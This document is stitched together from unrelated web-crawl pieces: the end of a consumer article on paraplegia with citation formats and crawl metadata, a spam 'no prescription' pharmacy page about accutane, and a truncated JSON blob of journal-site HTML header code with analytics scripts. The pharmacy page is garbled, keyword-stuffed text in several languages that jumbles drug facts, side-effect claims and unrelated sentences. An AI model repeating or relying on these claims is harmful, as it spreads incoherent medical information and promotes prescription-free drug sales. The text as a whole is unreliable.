Paraplegia is further categorized into complete or incomplete. Complete paraplegia is absolute damage of the region of the spinal cord. An individual with complete paraplegia may have total sensory and motor function loss. On the other hand, incomplete paraplegia defines partial damage. For example, someone with incomplete paraplegia may have sensory function but no movement, or vice versa.
Management
While some people with paraplegia can walk to a degree, many are dependent on wheelchairs or other supportive measures. Some individuals may also experience pain and muscle spasms at a varying degree.
Impotence and various degrees of urinary and fecal incontinence are very common in those affected. Many use catheters or a bowel management programs (often involving suppositories, enemas, or digital stimulation of the bowels) to address these problems.
With successful bladder and bowel management, paraplegics can prevent the vast majority of accidental urinary or bowel discharges.
If an individual is suspected of having a back or neck injury, they should not be moved from their position and remain still as complications and permanent paralysis can ensue. Contacting emergency medical assistance is recommended.
Support
Given adequate support, equipment and adaptations to the work/ home environment are available; paraplegics are perfectly capable of living productive, fulfilled lives.
There are several foundations and support groups that help paraplegic individuals, including:
• Back-Up Trust
• Buoniconti Fund
• Canadian Paraplegic Association
• CareCure Community
• Christopher & Dana Reeve Foundation
• Miami Project
• ThreeSixtyFive Foundation
• Spinal Cord Injuries Australia
• Spinal Cord Injury Peer Support
• Spinal Cord Injury Support
• Sam Schmidt Paralysis Foundation
References
Further Reading
Last Updated: Aug 23, 2018
Yolanda Smith
Written by
Yolanda Smith
Yolanda graduated with a Bachelor of Pharmacy at the University of South Australia and has experience working in both Australia and Italy. She is passionate about how medicine, diet and lifestyle affect our health and enjoys helping people understand this. In her spare time she loves to explore the world and learn about new cultures and languages.
Citations
Please use one of the following formats to cite this article in your essay, paper or report:
• APA
Smith, Yolanda. (2018, August 23). What is Paraplegia?. News-Medical. Retrieved on October 26, 2020 from https://www.news-medical.net/health/What-is-Paraplegia.aspx.
• MLA
Smith, Yolanda. "What is Paraplegia?". News-Medical. 26 October 2020. <https://www.news-medical.net/health/What-is-Paraplegia.aspx>.
• Chicago
Smith, Yolanda. "What is Paraplegia?". News-Medical. https://www.news-medical.net/health/What-is-Paraplegia.aspx. (accessed October 26, 2020).
• Harvard
Smith, Yolanda. 2018. What is Paraplegia?. News-Medical, viewed 26 October 2020, https://www.news-medical.net/health/What-is-Paraplegia.aspx.
Comments
1. Adela Hernandez Adela Hernandez United States says:
Under my brest to feet i have numb but i legs be jumping will i walk again
The opinions expressed here are the views of the writer and do not necessarily reflect the views and opinions of News Medical.
|
{
"url": "https://www.news-medical.net/health/What-is-Paraplegia.aspx",
"source_domain": "www.news-medical.net",
"snapshot_id": "crawl=CC-MAIN-2020-45",
"warc_metadata": {
"Content-Length": "94748",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:XK3LRBI6AL447LOOZMJBW6SNHV5XRBFC",
"WARC-Concurrent-To": "<urn:uuid:a2fc0ab6-2a8d-433a-8f7b-1a317ba5b2c2>",
"WARC-Date": "2020-10-26T21:25:31Z",
"WARC-IP-Address": "104.20.85.7",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:VNEDI4NXOXANUTLRY4WTKSK64AAUIHP5",
"WARC-Record-ID": "<urn:uuid:b00bdd6f-5cee-485c-8b84-729c9496a0fd>",
"WARC-Target-URI": "https://www.news-medical.net/health/What-is-Paraplegia.aspx",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:bf5cfa3e-541c-4a40-a4c8-e7aa662262e6>"
},
"warc_info": "isPartOf: CC-MAIN-2020-45\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for October 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-124.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
20,
21,
277,
278,
284,
285,
471,
472,
794,
795,
1016,
1017,
1126,
1127,
1144,
1145,
1364,
1365,
1689,
1690,
1705,
1706,
1859,
1860,
2254,
2255,
2266,
2267,
2468,
2469,
2723,
2724,
2855,
2856,
3089,
3090,
3098,
3099,
3267,
3268,
3362,
3363,
3381,
3401,
3437,
3460,
3500,
3518,
3548,
3583,
3619,
3650,
3687,
3688,
3699,
3700,
3716,
3717,
3744,
3745,
3759,
3760,
3771,
3772,
3786,
3787,
4137,
4138,
4148,
4149,
4242,
4243,
4251,
4252,
4422,
4423,
4431,
4432,
4569,
4570,
4582,
4583,
4730,
4731,
4743,
4744,
4890,
4891,
4900,
4901,
4958,
4959,
5038,
5039
],
"line_end_idx": [
20,
21,
277,
278,
284,
285,
471,
472,
794,
795,
1016,
1017,
1126,
1127,
1144,
1145,
1364,
1365,
1689,
1690,
1705,
1706,
1859,
1860,
2254,
2255,
2266,
2267,
2468,
2469,
2723,
2724,
2855,
2856,
3089,
3090,
3098,
3099,
3267,
3268,
3362,
3363,
3381,
3401,
3437,
3460,
3500,
3518,
3548,
3583,
3619,
3650,
3687,
3688,
3699,
3700,
3716,
3717,
3744,
3745,
3759,
3760,
3771,
3772,
3786,
3787,
4137,
4138,
4148,
4149,
4242,
4243,
4251,
4252,
4422,
4423,
4431,
4432,
4569,
4570,
4582,
4583,
4730,
4731,
4743,
4744,
4890,
4891,
4900,
4901,
4958,
4959,
5038,
5039,
5165
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5165,
"ccnet_original_nlines": 94,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 1,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.31151002645492554,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.006335800047963858,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.18901795148849487,
"rps_doc_frac_unique_words": 0.48941799998283386,
"rps_doc_mean_word_length": 5.488095283508301,
"rps_doc_num_sentences": 66,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.3719635009765625,
"rps_doc_word_count": 756,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.018799709156155586,
"rps_doc_frac_chars_dupe_6grams": 0.018799709156155586,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.009640879929065704,
"rps_doc_frac_chars_top_3gram": 0.019281750544905663,
"rps_doc_frac_chars_top_4gram": 0.026030369102954865,
"rps_doc_books_importance": -355.0068054199219,
"rps_doc_books_importance_length_correction": -355.0068054199219,
"rps_doc_openwebtext_importance": -241.42556762695312,
"rps_doc_openwebtext_importance_length_correction": -241.42556762695312,
"rps_doc_wikipedia_importance": -181.45437622070312,
"rps_doc_wikipedia_importance_length_correction": -181.45437622070312
},
"fasttext": {
"dclm": 0.02821505069732666,
"english": 0.9121736288070679,
"fineweb_edu_approx": 2.8453826904296875,
"eai_general_math": 0.04750930890440941,
"eai_open_web_math": 0.3438512086868286,
"eai_web_code": 0.0008406600099988282
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "617.52",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Surgery and Dentistry"
}
},
"secondary": {
"code": "617.5",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Surgery and Dentistry"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,380,482,202,636,198,400
|
What is accutane, What is in accutane. First Canadian Pharmacy - Canadian Pharmacy No Prescription
What is accutane accutane hepatitis
“I told him that it was going to take him much longer to get back given the current but he didn’t seem to care,” said Lyon. I know this is kind of off topic but I was wondering if you knew where I could find a captcha plugin for my comment form? This policy applies to admissions, employment, and access to and treatment in UPMC programs and activities.
What is in accutane
• Herzerkrankungen ( Herzinsuffizienz (Herzschwäche)), What is accutane Reizleitungsstörungen (AV-Block zweiten oder dritten Grades oder Sick-Sinus-Syndrom), Ischämie des Herzens (Sauerstoffmangel, wie er z. B. The reaction was poured into a solution of 1% TFA/H 2O (150 mL). A: Zestril (lisinopril) belongs to a group of medications called ACE inhibitors. The pills were true because the effect appeared after the first application. LEGAL DISCLAIMER: This website is for general information purposes only. My teeth were white and I took very good care of them. does medicaid cover accutane The major side effect of oral administration of clindamycin is a type of diarrhea caused by the opportunistic infection by Clostridium difficile. La puissance Cialis a l'ingrédient actif Tadalafil 20mg. @ Zayna, What is accutane wealthy ladies had garments tailored to fit perfectly as they went through the stages of pregnancy, including custom corsets. Bei der Behandlung von posttraumatischen Belastungsstörungen wird Propranolol als Off-Label-Use gegen Intrusionen und Übererregbarkeit eingesetzt. The Wright brothers becoming the first people to fly (albeit for about a minute) in 1903, while Zeppelins from Another World flying around the globe. BCCDC's Videos on Injection Landmarking and Technique: Subcutaneous Injection: Upper Arm Site. Clinically, visual snow might be for the visual system what tinnitus, i.e. As a result, she was hired to write songs for Britney Spears, New Kids on the Block, Fergie, and The Pussycat Dolls. I have meducal documentation of several of the most severe reactions and I am currently still taking it. Não são todas as pessoas que podem fazer uso desse medicamento, mesmo que contenham todos os sintomas que pedem a administração da substância.
Accutane
4.9 out of 5
based on 47 votes
In yet another embodiment, R 7 is a pyridylalkynyl group. I use it intermittently with the 0.04% Tretinoin Microsphere Gel (Supatret). This usually occurs when there is a psychological conflict in a relationship and difficulty with one partner. In addition to weekly aerobic exercise, it’s a good idea to add a walk for 10–15 minutes after each meal. but during the time we were away, does medicaid cover accutane I wasn't having the brewer's yeast because I'd forgotten to bring it. Wired to wireless, accutane hepatitis desktop to data center, on premise or through the cloud, we go to extreme measures for our customers in more than 80 countries, delivering 100% insourced call-in technical support to organizations large and small, including some of the world's leading names in business, hospitality, retail, transportation and logistics, education, government, healthcare and manufacturing. Other mechanisms implicated in DDC’s cytotoxic effects include its ability to chelate nickel, What is accutane to interfere with sulfhydryl groups in cytochrome P-450 enzymes, and to inhibit ADH and ALDH enzymes. subtilis strains C42, C50, F14, F19, and W25, and B.
Does medicaid cover accutane
Adikwu, What is accutane i visited different hospital but they gave me list of drugs like Famvir, Zovirax, and Valtrex which is very expensive to treat the symptoms and never cured me. The availability and accessibility of the drug to athletes across Europe is an important consideration in assessing the actual spread of meldonium use in athletes across Europe. It is also possible to change the level of gene expression in a cell or animal over time by changing the tetracycline analog used as the repressing agent. «The Fear Factor; Lady Gaga used tough times as inspiration for her new album». Au total, accutane severe side effects 101 patients ont été randomisés à l'un des trois différents dosages de départ de l'étude ouverte de losartan : une faible dose de 0,1 mg/kg/jour (n = 33), une dose moyenne de 0,3 mg/kg/jour (n = 34), ou une forte dose de 0,7 mg/kg/jour (n = 34). His stake doubled when Valeant bought the company. 201, 202 Patients with acyclovir resistant strains of HSV caused by a TK mutation are also resistant to valacyclovir, ganciclovir, and famciclovir because these antiviral agents also rely on TK phosphorylation. More than likely I am inclined to bookmark your blog post .
• Accutane prescription cost
• Accutane severe side effects
• What to expect after accutane
• Accutane contraindications
• Accutane hepatitis
• Does medicaid cover accutane
• Accutane before after mild acne
• What is in accutane
• Accutane side effects after stopping
• Accutane work
As a later article will cover deploying OWAS simply uncheck this option and then click Finish to complete the wizard. Most frequently reported are cleft lip, cardiovascular malformations and neural tube defects. Koordinieren, What is accutane die verbesserte langzeit-engraftment und ob. • clonidine 800 kaufen ohne rezept Kompetenzzentrum für gewicht-management vor belastungen. O termo “recentemente-nascido“ refere-se especificamente aos primeiros minutos ou horas que se seguem ao nascimento.
Does medicaid cover accutane
• des symptômes d'une grave réaction allergique (par ex. If you do not, the medicine may not clear up your infection completely. Archived from the original on September 14, What is accutane 2010 . ‡ Gonococci with 30 mcg tetracycline disk zone diameters of <19 mm usually indicate a plasmid-mediated tetracycline resistant Neisseria gonorrhoeae isolate. Ansonsten findest du meine Pflegeroutine auch in meinen Gastbeiträgen, What is accutane da habe ich schon darüber geschrieben. It is used to treat certain kinds of bacterial infections. The Estate lies between Bain’s Kloof and the Groenberg Mountain Range. Amitriptyline Dose and Treatment Outcomes in Specialty Headache Practice: A Retrospective Cohort Study. Tazocin (piperacillin and tazobactam) Tazocin injection contains two active ingredients; piperacillin, which is a penicillin-type antibiotic, and tazobactam, which is a medicine that prevents bacteria from inactivating piperacillin. Los eventos hepáticos pueden ser severos y se han reportado muertes en circunstancias extremadamente raras. In a healthy person, accutane severe side effects harmless resident intestinal bacteria compete with each other for food and places to "sit" along the inner intestinal wall. Avevo da poco compiuto 19 anni e mi pagavo gli studi universitari facendo ripetizioni a ragazzi che andavano alle medie. Reclaimed wood is also becoming such a hot topic in the interior world. I have now been on Gabapentin for nearly 6 months, my Doctor prescribed it for my Chronic Disabling Pain a lot like many of you but I still feel that I have a combination of Fibromyalgia and also Rheumatoid Arthritis. A mensagem eletrônica, que simulou uma espécie de pesquisa, tratava de informações falsas a respeito do candidato Lobão Filho. Antabus interagerer aktivt med mange andre medikamenter, og man bør derfor altid oplyse til sin læge, hvis man tager antabus. 0.7%; p<0.001), accutane severe side effects from combination therapy compared to ramipril alone. With this action, What is accutane the blood vessels dilate and penile muscles relax so that the blood flows freely into the erectile tissues for an erection. Further research turned up the information that DPP-4 the enzyme inhibited by Januvia does more than get rid of GLP-1 in the gut. The optimal therapy in an individual setting very much depends on the relative ease of local availability of these methods and techniques.
Leave a Reply
Your email address will not be published. Required fields are marked *
%d bloggers like this:
|
{
"url": "https://www.fb101.com/2017/07/at-the-oc-fair-they-tasted-the-difference/",
"source_domain": "www.fb101.com",
"snapshot_id": "crawl=CC-MAIN-2018-30",
"warc_metadata": {
"Content-Length": "62547",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:LFCOIEWCA6GK5DZ63EGOO7KMVCUFYA7X",
"WARC-Concurrent-To": "<urn:uuid:7bedcd01-2454-44fd-9868-412491dde163>",
"WARC-Date": "2018-07-20T22:06:17Z",
"WARC-IP-Address": "198.71.233.23",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:P5EUPFAXOQJDFJMCZGE4BHYTVGRE27ME",
"WARC-Record-ID": "<urn:uuid:9504d162-dee3-4e3b-913f-6d749d223712>",
"WARC-Target-URI": "https://www.fb101.com/2017/07/at-the-oc-fair-they-tasted-the-difference/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:79106135-ba0a-4202-955f-ef3c5d6500b6>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-141-15-74.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-30\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for July 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
99,
100,
136,
137,
491,
492,
512,
513,
2291,
2292,
2301,
2302,
2315,
2333,
3496,
3497,
3526,
3527,
4732,
4763,
4796,
4830,
4861,
4884,
4917,
4953,
4977,
5018,
5036,
5533,
5534,
5563,
5564,
7984,
7985,
7999,
8000,
8071,
8072
],
"line_end_idx": [
99,
100,
136,
137,
491,
492,
512,
513,
2291,
2292,
2301,
2302,
2315,
2333,
3496,
3497,
3526,
3527,
4732,
4763,
4796,
4830,
4861,
4884,
4917,
4953,
4977,
5018,
5036,
5533,
5534,
5563,
5564,
7984,
7985,
7999,
8000,
8071,
8072,
8094
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 8094,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 1,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.29380762577056885,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.02964426949620247,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1772068440914154,
"rps_doc_frac_unique_words": 0.609213650226593,
"rps_doc_mean_word_length": 5.2478156089782715,
"rps_doc_num_sentences": 69,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 6.0939836502075195,
"rps_doc_word_count": 1259,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.01301649957895279,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.011805660091340542,
"rps_doc_frac_chars_top_3gram": 0.021189650520682335,
"rps_doc_frac_chars_top_4gram": 0.018919330090284348,
"rps_doc_books_importance": -709.6556396484375,
"rps_doc_books_importance_length_correction": -709.6556396484375,
"rps_doc_openwebtext_importance": -396.0151062011719,
"rps_doc_openwebtext_importance_length_correction": -396.0151062011719,
"rps_doc_wikipedia_importance": -338.798583984375,
"rps_doc_wikipedia_importance_length_correction": -338.798583984375
},
"fasttext": {
"dclm": 0.17633187770843506,
"english": 0.8354629874229431,
"fineweb_edu_approx": 1.9826608896255493,
"eai_general_math": 0.009105030447244644,
"eai_open_web_math": 0.2768093943595886,
"eai_web_code": 0.0005435299826785922
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.6",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "615.5",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "5",
"label": "Social/Forum"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "2",
"label": "Text Extraction Errors"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "2",
"label": "Partially Correct"
},
"secondary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,842,513,741,880,259,000
|
{"markup":"\u003C?xml version=\u00221.0\u0022 encoding=\u0022UTF-8\u0022 ?\u003E\n \u003Chtml version=\u0022HTML+RDFa+MathML 1.1\u0022\n xmlns:content=\u0022http:\/\/purl.org\/rss\/1.0\/modules\/content\/\u0022\n xmlns:dc=\u0022http:\/\/purl.org\/dc\/terms\/\u0022\n xmlns:foaf=\u0022http:\/\/xmlns.com\/foaf\/0.1\/\u0022\n xmlns:og=\u0022http:\/\/ogp.me\/ns#\u0022\n xmlns:rdfs=\u0022http:\/\/www.w3.org\/2000\/01\/rdf-schema#\u0022\n xmlns:sioc=\u0022http:\/\/rdfs.org\/sioc\/ns#\u0022\n xmlns:sioct=\u0022http:\/\/rdfs.org\/sioc\/types#\u0022\n xmlns:skos=\u0022http:\/\/www.w3.org\/2004\/02\/skos\/core#\u0022\n xmlns:xsd=\u0022http:\/\/www.w3.org\/2001\/XMLSchema#\u0022\n xmlns:mml=\u0022http:\/\/www.w3.org\/1998\/Math\/MathML\u0022\u003E\n \u003Chead\u003E\u003Cscript type=\u0022text\/javascript\u0022 src=\u0022\/\/cdn.jsdelivr.net\/qtip2\/2.2.1\/jquery.qtip.min.js\u0022\u003E\u003C\/script\u003E\n\u003Cscript type=\u0022text\/javascript\u0022 src=\u0022https:\/\/www.g3journal.org\/sites\/default\/files\/js\/js_YjAJQgxDlFX6S-O02jj9jCrVbrwlY3CGgCg1FzPlvBs.js\u0022\u003E\u003C\/script\u003E\n\u003Cscript type=\u0022text\/javascript\u0022\u003E\n\u003C!--\/\/--\u003E\u003C![CDATA[\/\/\u003E\u003C!--\nif(typeof window.MathJax === \u0022undefined\u0022) window.MathJax = { menuSettings: { zoom: \u0022Click\u0022 } };\n\/\/--\u003E\u003C!]]\u003E\n\u003C\/script\u003E\n\u003Cscript type=\u0022text\/javascript\u0022 src=\u0022https:\/\/www.g3journal.org\/sites\/default\/files\/js\/js_gPqjYq7fqdMzw8-29XWQIVoDSWTmZCGy9OqaHppNxuQ.js\u0022\u003E\u003C\/script\u003E\n\u003Cscript type=\u0022text\/javascript\u0022\u003E\n\u003C!--\/\/--\u003E\u003C![CDATA[\/\/\u003E\u003C!--\n(function(i,s,o,g,r,a,m){i[\u0022GoogleAnalyticsObject\u0022]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,\u0022script\u0022,\u0022\/\/www.google-analytics.com\/analytics.js\u0022,\u0022ga\u0022);ga(\u0022create\u0022, \u0022UA-35990348-1\u0022, {\u0022cookieDomain\u0022:\u0022auto\u0022});ga(\u0022set\u0022, \u0022anonymizeIp\u0022, true);ga(\u0022send\u0022, \u0022pageview\u0022);ga(\u0027create\u0027, \u0027UA-76034214-10\u0027, \u0027auto\u0027, {\u0027name\u0027: \u0027hwTracker\u0027});\r\nga(\u0027set\u0027, \u0027anonymizeIp\u0027, true);\nga(\u0027hwTracker.send\u0027, \u0027pageview\u0027);\n\/\/--\u003E\u003C!]]\u003E\n\u003C\/script\u003E\n\u003Cscript type=\u0022text\/javascript\u0022\u003E\n\u003C!--\/\/--\u003E\u003C![CDATA[\/\/\u003E\u003C!--\njQuery.extend(Drupal.settings, {\u0022basePath\u0022:\u0022\\\/\u0022,\u0022pathPrefix\u0022:\u0022\u0022,\u0022highwire\u0022:{\u0022ac\u0022:{\u0022\\\/ggg\\\/5\\\/9\\\/1815.atom\u0022:{\u0022access\u0022:{\u0022full\u0022:true},\u0022pisa_id\u0022:\u0022\u0022,\u0022apath\u0022:\u0022\\\/ggg\\\/5\\\/9\\\/1815.atom\u0022,\u0022jcode\u0022:\u0022ggg\u0022}},\u0022processed\u0022:[\u0022highwire_math\u0022],\u0022markup\u0022:[{\u0022requested\u0022:\u0022long\u0022,\u0022variant\u0022:\u0022full-text\u0022,\u0022view\u0022:\u0022full\u0022,\u0022pisa\u0022:\u0022ggg;5\\\/9\\\/1815\u0022}]},\u0022instances\u0022:\u0022{\\u0022highwire_abstract_tooltip\\u0022:{\\u0022content\\u0022:{\\u0022text\\u0022:\\u0022\\u0022},\\u0022style\\u0022:{\\u0022tip\\u0022:{\\u0022width\\u0022:20,\\u0022height\\u0022:20,\\u0022border\\u0022:1,\\u0022offset\\u0022:0,\\u0022corner\\u0022:true},\\u0022classes\\u0022:\\u0022qtip-custom hw-tooltip hw-abstract-tooltip qtip-shadow qtip-rounded\\u0022,\\u0022classes_custom\\u0022:\\u0022hw-tooltip hw-abstract-tooltip\\u0022},\\u0022position\\u0022:{\\u0022at\\u0022:\\u0022right center\\u0022,\\u0022my\\u0022:\\u0022left center\\u0022,\\u0022viewport\\u0022:true,\\u0022adjust\\u0022:{\\u0022method\\u0022:\\u0022shift\\u0022}},\\u0022show\\u0022:{\\u0022event\\u0022:\\u0022mouseenter click \\u0022,\\u0022solo\\u0022:true},\\u0022hide\\u0022:{\\u0022event\\u0022:\\u0022mouseleave \\u0022,\\u0022fixed\\u0022:1,\\u0022delay\\u0022:\\u0022100\\u0022}},\\u0022highwire_author_tooltip\\u0022:{\\u0022content\\u0022:{\\u0022text\\u0022:\\u0022\\u0022},\\u0022style\\u0022:{\\u0022tip\\u0022:{\\u0022width\\u0022:15,\\u0022height\\u0022:15,\\u0022border\\u0022:1,\\u0022offset\\u0022:0,\\u0022corner\\u0022:true},\\u0022classes\\u0022:\\u0022qtip-custom hw-tooltip hw-author-tooltip qtip-shadow qtip-rounded\\u0022,\\u0022classes_custom\\u0022:\\u0022hw-tooltip hw-author-tooltip\\u0022},\\u0022position\\u0022:{\\u0022at\\u0022:\\u0022top center\\u0022,\\u0022my\\u0022:\\u0022bottom center\\u0022,\\u0022viewport\\u0022:true,\\u0022adjust\\u0022:{\\u0022method\\u0022:\\u0022\\u0022}},\\u0022show\\u0022:{\\u0022event\\u0022:\\u0022mouseenter \\u0022,\\u0022solo\\u0022:true},\\u0022hide\\u0022:{\\u0022event\\u0022:\\u0022mouseleave \\u0022,\\u0022fixed\\u0022:1,\\u0022delay\\u0022:\\u0022100\\u0022}},\\u0022highwire_reflinks_tooltip\\u0022:{\\u0022content\\u0022:{\\u0022text\\u0022:\\u0022\\u0022},\\u0022style\\u0022:{\\u0022tip\\u0022:{\\u0022width\\u0022:15,\\u0022height\\u0022:15,\\u0022border\\u0022:1,\\u0022mimic\\u0022:\\u0022top center\\u0022,\\u0022offset\\u0022:0,\\u0022corner\\u0022:true},\\u0022classes\\u0022:\\u0022qtip-custom hw-tooltip hw-ref-link-tooltip qtip-shadow qtip-rounded\\u0022,\\u0022classes_custom\\u0022:\\u0022hw-tooltip hw-ref-link-tooltip\\u0022},\\u0022position\\u0022:{\\u0022at\\u0022:\\u0022bottom left\\u0022,\\u0022my\\u0022:\\u0022top left\\u0022,\\u0022viewport\\u0022:true,\\u0022adjust\\u0022:{\\u0022method\\u0022:\\u0022flip\\u0022}},\\u0022show\\u0022:{\\u0022event\\u0022:\\u0022mouseenter \\u0022,\\u0022solo\\u0022:true},\\u0022hide\\u0022:{\\u0022event\\u0022:\\u0022mouseleave \\u0022,\\u0022fixed\\u0022:1,\\u0022delay\\u0022:\\u0022100\\u0022}}}\u0022,\u0022qtipDebug\u0022:\u0022{\\u0022leaveElement\\u0022:0}\u0022,\u0022googleanalytics\u0022:{\u0022trackOutbound\u0022:1,\u0022trackMailto\u0022:1,\u0022trackDownload\u0022:1,\u0022trackDownloadExtensions\u0022:\u00227z|aac|arc|arj|asf|asx|avi|bin|csv|doc(x|m)?|dot(x|m)?|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt(x|m)?|pot(x|m)?|pps(x|m)?|ppam|sld(x|m)?|thmx|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls(x|m|b)?|xlt(x|m)|xlam|xml|z|zip\u0022,\u0022trackColorbox\u0022:1},\u0022ajaxPageState\u0022:{\u0022js\u0022:{\u0022\\\/\\\/cdn.jsdelivr.net\\\/qtip2\\\/2.2.1\\\/jquery.qtip.min.js\u0022:1,\u0022sites\\\/all\\\/modules\\\/highwire\\\/highwire\\\/plugins\\\/highwire_markup_process\\\/js\\\/highwire_article_reference_popup.js\u0022:1,\u0022sites\\\/all\\\/modules\\\/highwire\\\/highwire\\\/plugins\\\/highwire_markup_process\\\/js\\\/highwire_at_symbol.js\u0022:1,\u00220\u0022:1,\u0022sites\\\/all\\\/modules\\\/contrib\\\/google_analytics\\\/googleanalytics.js\u0022:1,\u00221\u0022:1}}});\n\/\/--\u003E\u003C!]]\u003E\n\u003C\/script\u003E\n\u003Clink type=\u0022text\/css\u0022 rel=\u0022stylesheet\u0022 href=\u0022https:\/\/www.g3journal.org\/sites\/default\/files\/advagg_css\/css__uXgUByez87OKDsgffPHe7u5qNUzr7zOnqWrSJ87THKk__RR-QNYl6SsTObm37M1MaRCUwwzIP19wUZLcqO_pRc1Q__lDZC-66ftm82LH3sOPsR2Vb4UhP_It_P-8RUoCcL4wY.css\u0022 media=\u0022all\u0022 \/\u003E\n\u003Clink type=\u0022text\/css\u0022 rel=\u0022stylesheet\u0022 href=\u0022\/\/cdn.jsdelivr.net\/qtip2\/2.2.1\/jquery.qtip.min.css\u0022 